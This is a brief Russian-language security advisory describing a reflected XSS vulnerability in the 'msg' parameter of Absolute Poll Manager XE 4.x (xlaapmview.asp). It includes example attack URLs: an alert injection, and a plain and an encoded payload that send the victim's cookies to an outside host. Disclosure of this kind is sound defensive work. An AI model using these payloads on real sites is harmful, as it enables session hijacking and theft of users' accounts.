Хакер #305. Многошаговые SQL-инъекции
Программа: Absolute Poll Manager XE 4.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" сценарием xlaapmview.asp (когда "p" установлен в числовое значение). Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Инжектирование Alert сообщения
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert ("running+code+within+the+context+of+"%2bdocument.domain)</script>
Воровство Cookie
http://target-domain.com/AbsolutePollManager/xlaapmview.asp? p=1&msg=<script>location="http://procheckup.com/? "%2bdocument.cookie</script>
Частичная подделка данных
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript% 3elocation=%22http%3a//proch%65ckup%2ecom/?%22%2 bdocument.cookie%3c/script%3e&